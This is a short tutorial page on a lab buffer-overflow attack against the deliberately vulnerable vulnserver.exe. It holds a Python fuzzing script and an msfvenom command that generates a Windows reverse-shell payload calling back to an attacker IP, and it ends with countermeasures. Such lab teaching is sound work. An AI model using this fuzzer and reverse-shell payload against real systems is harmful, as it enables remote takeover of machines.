Windows-Based Buffer Overflow Attack

Overview

This document details the exploitation of a vulnerable Windows executable. We use a fuzzing script, analyze crashes, and inject shellcode.

1. Setting Up a Vulnerable Windows Application

We target vulnserver.exe, an intentionally vulnerable program for exploitation practice. Download from: https://github.com/stephenbradshaw/vulnserver

  • Run vulnserver.exe on a Windows VM.

  • Attach Immunity Debugger to monitor crashes.

2. Fuzzing with Python (fuzz.py)

import socket

target_ip = "192.168.1.100"  # Replace with your Windows VM's IP
target_port = 9999

buffer = b"A" * 1000  # Adjust length

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(buffer)
s.close()

print("Sent fuzzing payload.")

Run it:

python3 fuzz.py

3. Debugging the Crash

  • Attach Immunity Debugger.

  • Identify EIP control (modify execution flow).

  • Inject custom shellcode (e.g., reverse shell).

4. Exploit Development

Once EIP overwrite is confirmed, generate shellcode using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.200 LPORT=4444 -b "\x00\x0A" -f python

Modify exploit to inject shellcode and take control of execution.

5. Countermeasures

  • Use DEP (Data Execution Prevention).

  • Implement ASLR (Address Space Layout Randomization).

  • Use stack canaries to detect buffer overflows.

PreviousBuffer Overflow VulnerabilityNextMan-in-the-Middle (MITM) Attack